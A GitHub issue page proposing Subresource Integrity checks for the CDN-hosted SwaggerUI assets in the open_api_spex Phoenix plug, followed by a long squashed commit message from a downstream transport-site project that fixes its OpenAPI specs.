-
Notifications
You must be signed in to change notification settings - Fork 184
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Adding "integrity" to CDN-based resources (JS/CSS), thoughts? #559
Comments
thbar
added a commit
to etalab/transport-site
that referenced
this issue
Aug 28, 2023
github-merge-queue bot
pushed a commit
to etalab/transport-site
that referenced
this issue
Sep 4, 2023
* Change case to reflect current branding * Improve description * Fix AOM API schema (#3350) * Run mix format * Fix community_resources.updated * Fix more datasets spec * Update schemas.ex * Fix format * Add assert_schema on datasets list operation * Fix /api/datasets specification We now properly report the response to be an array of Datasets, instead of a single Dataset. * Rename operation response (unsure of the impact) * Update documentation for datasets operation * Add more assert_schema * Achieve more assert schemas * Fix Dialyzer issues (#3397) * Fix credo warning * Add missing data required for API output See: - #3396 - #3399 * Make .aom.siren officially nullable See: - #3396 This will fix tests and make sure to reflect the actual production data. * Group operations together on the swagger UI * Update doc to reflect reality * Add TODO * Add one aom test at least * Fix test * Fix & modernize AOM specs (#3401) * Start fixing Resource & CommunityResource specs * Fix Autocomplete spec & add assert_schema * Start fixing Dataset spec * Update stats_controller_test.exs * Add notes about conversions * Add TODO * Remove unused import * Add TODO * Add req in dev for scripting Required because I now run some scripts with `mix run` to get the full app env. * Format * Create .gitignore * Format * Remove sometimes unseen field to reflect API behaviour * Format * Format * Format * Add missing schema_version * Format * Format * Temporary allow community resources here (#3407) * Start fixing CoveredArea (just country case for now) * Save WIP script used to validate current production data against local OpenAPI spec * Remove TODO * Add CoveredArea.Region and CoveredArea.AOM * Advertise behaviour #3408 * Add CoveredArea.Cities * Enforce type value for covered areas * Enforce type field value for Region * Remove bogus property * Format * Fix broken cities schema * Refactor dataset spec Improvements: - extract spec so that history is not allowed in the summarized view - make all keys required with an opt-out option * Emphasize this specific response is summarized a bit * Remove all "nullable: false" (since this is the default) * Introduce summarized vs detailed Resource * Improve GeoJSON / NeTEx checks * Set properties for community & regular resources * Format * Remove todo (won't do that) * Fix optional properties * Download all the datasets JSON * Improve dataset details spec * Remove TODO * Verify Resource properties * Allow direct "./scripts/api/spec_check.exs" invoke from shell * Increase timeout * Refactor tests for clarity * Disable highlight to fix SwaggerUI hanging in browser on large payloads (#3421) * Add note about SwaggerUI version See open-api-spex/open_api_spex#559 * Add useful links * Mix format * Add obsolete note * Fix wording * Remove comment which applies everywhere * Require all by default * Improve factories for required data (for tests to pass) Related: - #3399 * Improve wording * Fix broken specs * Fix broken specs * Fix broken assertion * Fix broken spec * Add extra assert_schema * Apply routing related match error fix * Enforce additionalProperties: false for all detected schemas with type object * Run mix format * DRY optional keys & remove TODO * Fix credo warning * Fix credo warning * Fix credo warning * Fix typo * Start verifying feature collections * Allow extra property for GeometryBase * Remove unused import * Fix (I think) Polygon to make tests pass * Move id to the right place * Add missing type * DRY things a bit * Add quiet TODO * Add note * Remove TODO (this is not correct) * Add note * Specify history & remove TODO * Remove TODO (will put it in the description of the PR) * Fix incorrect note * Fix broken link * Add note * Update schemas.ex * Mix format * Improve texts * Mix format * Update apps/transport/lib/transport_web/api/controllers/places_controller.ex Co-authored-by: Antoine Augusti <[email protected]> * Update apps/transport/lib/transport_web/api/schemas.ex Co-authored-by: Antoine Augusti <[email protected]> * Update apps/transport/lib/transport_web/api/schemas.ex Co-authored-by: Antoine Augusti <[email protected]> * Update apps/transport/test/support/factory.ex Co-authored-by: Antoine Augusti <[email protected]> * Update apps/transport/test/transport_web/controllers/api/schemas_test.exs Co-authored-by: Antoine Augusti <[email protected]> * Update apps/transport/test/transport_web/controllers/api/schemas_test.exs Co-authored-by: Antoine Augusti <[email protected]> * Update apps/transport/lib/transport_web/api/spec.ex Co-authored-by: Antoine Augusti <[email protected]> * Add note * Update apps/transport/test/transport_web/controllers/api/stats_controller_test.exs Co-authored-by: Antoine Augusti <[email protected]> * Fix broken test --------- Co-authored-by: Antoine Augusti <[email protected]>
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
While checking the version of SwaggerUI I noticed that the plug which specifies the JS/CSS resources relies on a CDN, but the integrity (https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity) is not currently checked:
open_api_spex/lib/open_api_spex/plug/swagger_ui.ex
Line 43 in c1dbca1
open_api_spex/lib/open_api_spex/plug/swagger_ui.ex
Lines 69 to 70 in c1dbca1
In case of resource compromise on the CDN, this would make arbitrary execution of JS on the main Phoenix app (since the plug is most of the time, I think, served from the same domain).
It would be worthwhile to add
integrity
to the resource (see https://stackoverflow.com/a/49061277/20302).I wonder if a more flexible approach to let version/integrity be provided by the user of OpenAPISpex could be better.
Let me know what you think!
The text was updated successfully, but these errors were encountered: